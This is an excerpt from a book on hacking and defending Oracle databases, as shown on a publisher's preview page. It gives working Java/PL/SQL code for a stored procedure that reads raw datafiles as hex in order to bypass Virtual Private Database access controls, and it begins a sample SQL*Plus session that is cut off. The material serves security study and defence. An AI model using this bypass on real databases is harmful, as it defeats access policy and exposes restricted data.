8.2. Defeating VPDs with Raw File Access
You can entirely bypass database enforced access control by accessing the raw data file itself. This is fully covered in Chapter 11 — but here's the code now:
SET ESCAPE ON SET ESCAPE "\" SET SERVEROUTPUT ON CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADBINFILE" AS import java.lang.*; import java.io.*; public class JAVAREADBINFILE { public static void readbinfile(String f, int start) throws IOException { FileInputStream fis; DataInputStream dis; try { int i; int ih,il; int cnt = 1, h=0,l=0; String hex[] = {"0", "1", "2","3", "4", "5", "6", "7", "8","9", "A", "B", "C", "D", "E","F"}; RandomAccessFile raf = new RandomAccessFile (f, "r"); raf.seek (start); for(i=0; i<=512; i++) { ih = il = raf.readByte() \& 0xFF; h = ih ≫ 4;
l = il \& 0x0F; System.out.print("\\\\x" + hex[h] + hex[l]); if(cnt \% 16 == 0) System.out.println(); cnt ++; } } catch (EOFException eof) { System.out.println(); System.out.println( "EOF reached " ); } catch (IOException ioe) { System.out.println( "IO error: " + ioe ); } } } / show errors / CREATE OR REPLACE PROCEDURE JAVAREADBINFILEPROC (p_filename IN VARCHAR2, p_start in number) AS LANGUAGE JAVA NAME 'JAVAREADBINFILE.readbinfile (java.lang.String, int)'; / show errors /
Once this has been created you can use it to read the files directly — in this case, the VPDTESTTABLE exists in the USERS tablespace:
SQL> set serveroutput on SQL> exec dbms_java.set_output(2000); PL/SQL procedure successfully completed. SQL> ...
Get The Oracle® Hacker's Handbook: Hacking and Defending Oracle now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.